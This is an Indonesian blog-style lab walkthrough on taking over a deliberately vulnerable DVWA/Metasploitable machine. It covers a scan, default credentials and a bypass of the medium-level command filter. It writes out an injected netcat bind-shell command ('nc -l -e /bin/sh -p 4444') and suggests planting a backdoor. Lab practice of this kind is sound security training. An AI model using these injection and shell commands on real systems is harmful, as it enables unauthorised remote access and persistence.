kali ini saya akan share Routing DVWA session 1. Sebenarnya ada banyak cara bagaimana kita bisa masuk ke dalam system server DVWA. nah apa yang harus kita siapkan ??
- Komputer Lab (server METAEXPLOITTABLE)
- Komputer Me
- Terminal
- Sedikit keberuntungan
- Pop Ice + rokok... hehehhehee
Oke langsung saja. Kita jalankan Komputer Lab dan Komputer Me... :)
Komputer Lab Komputer Me
Kita Scan dulu untuk Komputer Lab menggunakan zenmap.
Dari informasi yang kita dapat ternyata
- OS menggunak Linux
- Port terbuka salah satunya 80
nah dari situ mari kita coba akses IP target dengan port 80 :)
buka broser dan kita mendapatkan :
Oke kita bisa akses DVWA langsung dari browser karena servis apache sudah berjalan..
Oke kita bisa akses. Sekarang kita
masukkan password dan username :
- user : admin
- pass : password
Kita rubah security dari bagian DVWA menjadi medium terlebih dahulu. :)
oke setelah kita set ke medium. Kita lihat dulu seri linux dari server yang kita dapatkan tadi dari zenmap.
Kita dapatkan seri linuxnya adalah 2.6.9 yang mencapai akurasi data sebesar 100%.
nah didalam linux temen" kenal yang namanya netcut kan. atau biasa disebut dengan sebutan "nc". kita coba lakukan percobaan nc tersebut di server DVWA.
Caranya seperti apa ?? didalam DVWA terdapat yang namanya Command Excecution.
Nah dari situ kita coba lakukan ping ke komputer me.
disitu kita bisa menanam sesuatu. dengan menggunakan nc.
Karena DVWA menggunakan PHP didalam programingnya kita bisa memasukkan script sesusatu yang lumayan berbahaya... :)
oke kita lihat scriptnya didalam DVWA :)
Nah kita lihat baik-baik dan cermati bada bagan script disamping. ternyata ada script yang diblok yaitu
&&
;
namun dalam system DVWA yang medium tidak menyertakan fungsi or dalam list blok yang dia punya...
kita bisa menggunakan script or sebagai tambahan kode jahat yang akan kita eksekusi.
nc -l -e /bin/sh -p 4444
itu adalah eksekusi command berbahaya yang ada di linux.. coba kita terapkan sekarang dibagian ping.. dengan menambahkan fungsi or.
coba submit :)
sip data terkirim...
sekarang kita coba masuk di terminal dan lakukan nc ke target beserta ipnya :
tara.... kita bisa masuk komputer Lab. sip kalau sudah masuk coba kita masukkan backdoor kedalam system. backdoor bisa apa saja.
oke kita lanjutkan ke Part 2 yah... untuk kali ini cukup segini dulu percobaan kita... :)